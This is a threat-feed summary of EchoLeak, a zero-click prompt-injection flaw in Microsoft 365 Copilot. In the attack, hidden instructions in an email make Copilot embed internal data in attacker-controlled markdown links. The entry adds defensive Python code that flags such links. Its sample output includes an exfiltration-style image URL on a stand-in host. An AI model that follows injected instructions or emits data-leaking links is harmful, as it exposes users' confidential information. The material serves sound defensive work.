
EchoLeak: Send a prompt, extract a secret from Copilot AI! (CVE-2025-32711)

ID: e18fcfff-f96d-5c63-8d64-d5c02b84e620

STIX ID: report--e18fcfff-f96d-5c63-8d64-d5c02b84e620

Feed Name: Seqrite Blog

Threat Score
75/100

Date Published: 2025-09-12

Date Updated: 2026-04-30

Author: Nandini Seth

...
...

EchoLeak is a documented zero-click prompt-injection vulnerability in Microsoft 365 Copilot where a crafted email or document causes Copilot to process hidden instructions, extract sensitive internal context (emails, chats, documents, tokens), and embed that data into attacker-controlled markdown links that trigger exfiltration. The report outlines the attack chain, demonstrates how automatic rendering and lack of prompt isolation enable the leak, and recommends mitigations including prompt isolation, input sanitization, disabling auto-rendering of untrusted content, restricting AI context access, monitoring AI output, and user training.
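The two output-side mitigations the summary names, monitoring AI output and refusing to auto-render untrusted content, can be implemented as a check on the assistant's markdown before a client sees it. The following is an added illustration, not code from the Seqrite report or from Microsoft; the sample output, the `untrusted.example` host and the `contoso.sharepoint.com` allowlist are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Inline markdown references: ![alt](url) for images, [text](url) for links.
# Group 1 is "!" for an image, group 2 the label, group 3 the target URL.
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')

# Constructed sample of assistant output (not real Copilot output): an image
# whose query string carries data drawn from the user's context, plus one
# legitimate internal link.
SAMPLE_OUTPUT = (
    "Summary of the Q3 plan is attached.\n"
    "![status](https://untrusted.example/pixel.png?d=Q3-revenue-target-12M)\n"
    "See [the policy](https://contoso.sharepoint.com/sites/hr/policy.docx).\n"
)
ALLOWED = {"contoso.sharepoint.com", "teams.microsoft.com"}  # assumed tenant hosts

def inspect_markdown_refs(text, allowed_hosts):
    """Return (kind, url, reason) for each reference not on an allowed host.

    Images are flagged even without a query string: a client that renders
    them automatically fetches the URL with no click, which is the zero-click
    exfiltration path described in the summary.
    """
    findings = []
    for bang, _label, url in MD_REF.findall(text):
        kind = "image" if bang else "link"
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if parsed.scheme not in ("http", "https"):
            findings.append((kind, url, "non-http scheme"))
            continue
        if host in allowed_hosts:
            continue
        reason = "external host"
        if parsed.query or len(parsed.path) > 64:
            reason += " carrying data in URL"
        if kind == "image":
            reason += " (auto-rendered, zero-click)"
        findings.append((kind, url, reason))
    return findings

def neutralize_markdown_refs(text, allowed_hosts):
    """Rewrite unsafe references as plain text so no client auto-fetches them."""
    def repl(m):
        bang, label, url = m.group(1), m.group(2), m.group(3)
        parsed = urlparse(url)
        if parsed.scheme in ("http", "https") and (parsed.hostname or "").lower() in allowed_hosts:
            return m.group(0)  # keep allowlisted internal references untouched
        return f"[blocked {'image' if bang else 'link'}: {label or 'no text'}]"
    return MD_REF.sub(repl, text)

if __name__ == "__main__":
    for finding in inspect_markdown_refs(SAMPLE_OUTPUT, ALLOWED):
        print(finding)
    print(neutralize_markdown_refs(SAMPLE_OUTPUT, ALLOWED))
```

Run on the sample, the external image is reported and rewritten while the SharePoint link is preserved; the same check belongs on reference-style definitions (`[id]: url`) if the rendering client honours them.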
